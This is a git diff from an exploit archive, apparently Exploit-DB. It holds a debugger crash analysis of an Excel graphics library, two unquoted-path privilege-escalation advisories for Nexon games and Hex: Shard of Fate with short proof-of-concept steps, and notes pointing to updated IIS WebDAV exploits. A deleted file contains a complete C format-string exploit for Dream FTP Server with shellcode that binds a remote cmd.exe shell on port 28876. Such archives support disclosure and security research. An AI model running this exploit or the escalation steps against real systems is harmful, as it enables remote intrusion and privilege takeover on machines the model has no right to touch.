+Minor : USER32!DispatchMessageW+0xf
+Minor : Excel!Ordinal40+0x24572
+Minor : Excel!Ordinal40+0x24441
+Minor : Excel!Ordinal40+0x424b
+Minor : Excel!Ordinal40+0x3f0a
+Minor : kernel32!RegisterWaitForInputIdle+0x49
+Instruction Address: 0x0000000044175083
+
+Description: Read Access Violation near NULL
+Short Description: ReadAVNearNull
+
+Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
+Recommended Bug Title: Read Access Violation near NULL starting at OGL!GdipGetImageThumbnail+0x000000000001118e (Hash=0xd8abe4f2.0x3a6d64a1)
+
+This is a user mode read access violation near null, and is probably not exploitable.
+----------------------------------------------------------------------
+More:
+
+> r
+eax=00000001 ebx=0000000c ecx=00000000 edx=00000000 esi=0ab4aea0 edi=0000401d
+eip=44175083 esp=0013e3a8 ebp=0013e3a8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
+OGL!GdipGetImageThumbnail+0x1118e:
+44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
+
+> ub
+OGL!GdipGetImageThumbnail+0x1117b:
+44175070 8b01 mov eax,dword ptr [ecx]
+44175072 ff5004 call dword ptr [eax+4]
+44175075 8bc8 mov ecx,eax
+44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a)
+4417507c 5d pop ebp
+4417507d c21000 ret 10h
+44175080 55 push ebp
+44175081 8bec mov ebp,esp
+
+> kv
+ChildEBP RetAddr Args to Child
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0013e3a8 440787db 0ab4aea0 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e
+0013e3c8 44078543 0000401d 00000000 00000000 OGL!GdipGetPathPointsI+0x2da6
+0013e3f8 440784cd 0000015c 07915974 07915028 OGL!GdipGetPathPointsI+0x2b0e
+0013e410 77f2067f 2f011136 012f2750 07915904 OGL!GdipGetPathPointsI+0x2a98
+0013e490 44074c79 2f011136 404ccccc 4407840d GDI32!SetMetaRgn+0x87
+0013e4c8 44078750 2f011136 3e460aa3 0013e548 OGL!GdipCreateMetafileFromWmfFile+0x652
+0013e568 440785a8 43487fff 3e460aa3 0013e6a0 OGL!GdipGetPathPointsI+0x2d1b
+0013e6b8 44074b9a 00000000 42c00000 42c00000 OGL!GdipGetPathPointsI+0x2b73
+0013e7b4 4402cfc4 0ab4a320 00000000 00000000 OGL!GdipCreateMetafileFromWmfFile+0x573
+0013e818 4403e16f 0ab4a320 0013e840 0013e850 OGL!GdipGetVisibleClipBoundsI+0x1c6
+0013e888 438e7d74 00000000 00000000 00000000 OGL!GdipDrawImageRectRect+0x111
+0013e998 437a4f9f 0874a780 07aeec68 ad01865f gfx+0x147d74
+0013ea64 437b3ec8 0874a780 00000001 0722b898 gfx+0x4f9f
+0013ea78 437b3ec8 0874a780 00000000 0722b848 gfx+0x13ec8
+0013ea8c 437b3ec8 0874a780 0013eb40 0b06f120 gfx+0x13ec8
+0013eaa0 437a4ecd 0874a780 ad018713 0013ee04 gfx+0x13ec8
+0013eb28
437aed1a 0722b848 0013eb40 0013f194 gfx+0x4ecd
+0013eb70 437aecef 0b06f120 0013ebac 0013f194 gfx+0xed1a
+0013eb88 437aecc3 086f2410 0013ebac 0013f194 gfx+0xecef
+0013ebf4 437af6fc 0013ec80 086f2410 00000002 gfx+0xecc3
+----------------------------------------------------------------------
+
+0:000> u eip
+OGL!GdipGetImageThumbnail+0x1118e:
+44175083 ff7104 push dword ptr [ecx+4]
+44175086 ff31 push dword ptr [ecx]
+44175088 8b4d08 mov ecx,dword ptr [ebp+8]
+4417508b 8b01 mov eax,dword ptr [ecx]
+4417508d ff5004 call dword ptr [eax+4]
+44175090 8bc8 mov ecx,eax
+44175092 e8922bebff call OGL!GdipDeletePen+0x115 (44027c29)
+44175097 5d pop ebp
+
+
+0:000> kvn1
+ # ChildEBP RetAddr Args to Child
+00 0013e308 440787db 08f22870 0000401d 00000000 OGL!GdipGetImageThumbnail+0x1118e
+
+0:000> dd ecx+4
+00000004 ???????? ???????? ???????? ????????
+00000014 ???????? ???????? ???????? ????????
+00000024 ???????? ???????? ???????? ????????
+00000034 ???????? ???????? ???????? ????????
+00000044 ???????? ???????? ???????? ????????
+00000054 ???????? ???????? ???????? ????????
+00000064 ???????? ???????? ???????? ????????
+00000074 ???????? ???????? ???????? ????????
+
+
+0:000> u eip-11
+OGL!GdipGetImageThumbnail+0x1117d:
+44175072 ff5004 call dword ptr [eax+4]
+44175075 8bc8 mov ecx,eax
+44175077 e88e4af0ff call OGL!GdipGetPathPointsI+0x40d5 (44079b0a)
+4417507c 5d pop ebp
+4417507d c21000 ret 10h
+44175080 55 push ebp
+44175081 8bec mov ebp,esp
+44175083 ff7104 push dword ptr [ecx+4] <= crash
+
+OGL!GdipGetImageThumbnail+0x1118e:
+44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=????????
+
+----------------------------------------------------------------------
+By: HauntIT Blog @ 2016
diff --git a/platforms/windows/local/39102..py b/platforms/windows/local/39102.py
similarity index 100%
rename from platforms/windows/local/39102..py
rename to platforms/windows/local/39102.py
diff --git a/platforms/windows/local/39809..cs b/platforms/windows/local/39809.cs
similarity index 100%
rename from platforms/windows/local/39809..cs
rename to platforms/windows/local/39809.cs
diff --git a/platforms/windows/local/39814.txt b/platforms/windows/local/39814.txt
new file mode 100755
index 000000000..599aca506
--- /dev/null
+++ b/platforms/windows/local/39814.txt
@@ -0,0 +1,34 @@
+-----------------------------------------------------------------------------------------------------------------
+# Exploit Title: Multiples Nexon Games - Privilege Escalation Unquoted path vulnerabilities
+# Date: 13/05/2016
+# Exploit Author : Cyril Vallicari
+# Vendor Homepage: http://www.nexon.net/
+# Softwares Links: http://dirtybomb.nexon.net/ (DirtyBomb)
+# http://store.steampowered.com/app/273110/ (CSNZ)
+# Versions: Dirty Bomb r56825 USA_EU / CSNZ : 0.0.18845.1
+# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
+
+Description : Multiples Nexon Game, including but not limited to Dirty Bomb
+and Counter-Strike Nexon : Zombies, are Prone to unquoted path
+vulnerability. They fail to quote correctly the command that call for
+BlackXcht.aes, which is a part of the anti-cheat system (Nexon Game
+Security). Probably all Nexon games calling this file are affected.
+
+This could potentially allow an authorized but non-privileged local user to
+execute arbitrary code with elevated privileges on the system.
+
+POC :
+
+Put a software named Program.exe in C:
+
+Launch the game via steam
+
+When BlackXcht.aes is called, Program.exe is executed with same rights as
+steam
+
+POC video : https://www.youtube.com/watch?v=wcn62GGwtcQ
+
+Patch :
+
+Patch for Dirty bomb - Upgrade to r57457 USA_EU
+-----------------------------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/platforms/windows/local/39820.txt b/platforms/windows/local/39820.txt
new file mode 100755
index 000000000..29f970109
--- /dev/null
+++ b/platforms/windows/local/39820.txt
@@ -0,0 +1,38 @@
+-----------------------------------------------------------------------------------------------------------------
+# Exploit Title: Hex : Shard of Fate 1.0.1.026 - Privilege
+Escalation Unquoted path vulnerability
+# Date: 15/05/2016
+# Exploit Author : Cyril Vallicari
+# Vendor Homepage: http://gameforge.com
+# Software Link: https://hex.gameforge.com/ or via steam
+# Version: 1.0.1.026 and probably prior
+# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
+
+Summary : Hex: Shard of Fate is a new breed of digital card game, combining
+classic TCG gameplay with elements of an online RPG
+
+Description : The game executable is prone to an unquoted path
+vulnerability. When you go to the in-game store it fail to quote the
+following command which is used multiple times :
+
+C:/Program Files (x86)/Steam/steamapps/common/HEX SHARDS OF
+FATE/Hex_Data/StreamingAssets/uWebKit/Windows/x86/UWKProcess.exe -parentpid
+5808
+-processdb QzovVXNlcnMvVXRpbGlzYXRldXIvQXBwRGF0YS9Mb2NhbExvdy9IRVggRW50ZXJ0YWlubWVu
+dC9IZXgvdVdlYktpdFByb2Nlc3MuZGI=
+
+This could potentially allow an authorized but non-privileged local user to
+execute arbitrary code with elevated privileges on the system.
+
+POC :
+
+Put a software named Program.exe in C:
+
+Launch the game or steam with high privileges and go to store
+
+POC video : https://www.youtube.com/watch?v=E1_1wZea1ck
+
+Patch :
+
+Still waiting, no reward so full disclosure after 10 days
+-----------------------------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/platforms/windows/remote/22365.pl b/platforms/windows/remote/22365.pl
index c0a3beff5..aad8d9453 100755
--- a/platforms/windows/remote/22365.pl
+++ b/platforms/windows/remote/22365.pl
@@ -1,3 +1,5 @@
+E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
+
 source: http://www.securityfocus.com/bid/7116/info
 
 The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
diff --git a/platforms/windows/remote/22367.txt b/platforms/windows/remote/22367.txt
index 32a569312..d561e14df 100755
--- a/platforms/windows/remote/22367.txt
+++ b/platforms/windows/remote/22367.txt
@@ -1,3 +1,5 @@
+E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/
+
 source: http://www.securityfocus.com/bid/7116/info
 
 The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
diff --git a/platforms/windows/remote/23661.c b/platforms/windows/remote/23661.c
deleted file mode 100755
index 546ba3627..000000000
--- a/platforms/windows/remote/23661.c
+++ /dev/null
@@ -1,102 +0,0 @@
-source: http://www.securityfocus.com/bid/9600/info
-
-It has been reported that Dream FTP Server may be prone to a remote format string vulnerability when processing a malicious request from a client for a username during FTP authentication. The issue could crash the server.
-
-Dream FTP Server version 1.02 has been reported to be prone to this issue, however, it is possible that other versions may be affected by this issue as well.
-
-#include
-#include
-#include
-#include
-
-// WIN NT/2K/XP cmd.exe shellcode
-// kernel32.dll baseaddress calculation: OS/SP-independent
-// string-save: 00, 0a and 0d free.
-// portbinding: port 28876
-// looping: reconnect after disconnect
-char* shellcode =
- "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
- "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
- "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
- "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
- "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
- "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
- "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
- "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
- "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
- "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
- "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
- "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
- "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
- "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
- "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
- "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
- "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
- "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
- "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
- "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
- "\x83\xc4\x5c\x61\xeb\x89";
-
-int main(int argc, char *argv[], char *envp[]) {
- int sock;
- FILE* FILEsock;
- struct sockaddr_in addr;
- int port = 21;
- char buffer[1024];
-
- if (argc<2 || argc>3) {
- printf("Usage: %s IP [PORT]\n", argv[0]);
- exit(-1);
- }
- if (argc == 3) port = atoi(argv[2]);
-
- printf("- Nightmare --------------------------------------------------\n"
- " Dream FTP v1.2 formatstring exploit.\n"
- " Written by SkyLined .\n"
- " Credits for the vulnerability go to badpack3t\n"
- " .\n"
- " Shellcode based on work by H D Moore (www.metasploit.com).\n"
- " Greets to everyone at 0dd and #netric.\n"
- " (K)(L)(F) for Suzan.\n"
- "\n"
- " Binds a shell at %s:28876 if successfull.\n"
- " Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP 1.0.0.1)\n"
- "--------------------------------------------------------------\n",
- argv[1]);
-
- addr.sin_family = AF_INET;
- addr.sin_port = htons(port);
- addr.sin_addr.s_addr = inet_addr(argv[1]);
-
- if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
- connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 ||
- (FILEsock = fdopen(sock, "r+")) == NULL) {
- fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port);
- perror(NULL);
- exit(-1);
- }
-
- printf("\n[+] Connected to %s:%d.\n", argv[1], port);
- do printf(" --> %s", fgets(buffer, sizeof buffer, FILEsock));
- while (strstr(buffer, "220-") == buffer);
-
- printf("\n[+] Sending exploit string...\n");
- fprintf(FILEsock,
- // Argument 10 points to the SEH handler code, it's RWE so we'll change
- // the SEH handler to redirect execution to the beginning of our
- // formatstring. When the SEH handler is called [ebx+0x3c] points
- // to the start of our formatstring, we just have to jump over the
- // formatstring exploit itself to our shellcode:
- "\xeb\x29" // Jump over the formatstring exploit
- "%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n" // Argument 10 -> SEH
- "%%n" // Causes exception after SEH adjustment.
- "@@@@@@@@" // nopslide landing zone for jump
- "%s\r\n", // shellcode
- 0x3C63FF-0x4f, // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C])
- shellcode);
- fflush(FILEsock);
- close(sock);
- printf("\n[+] Done, allow a few seconds on a slow target before you can\n"
- " connect to %s:28876.\n", argv[1]);
- return 0;
-}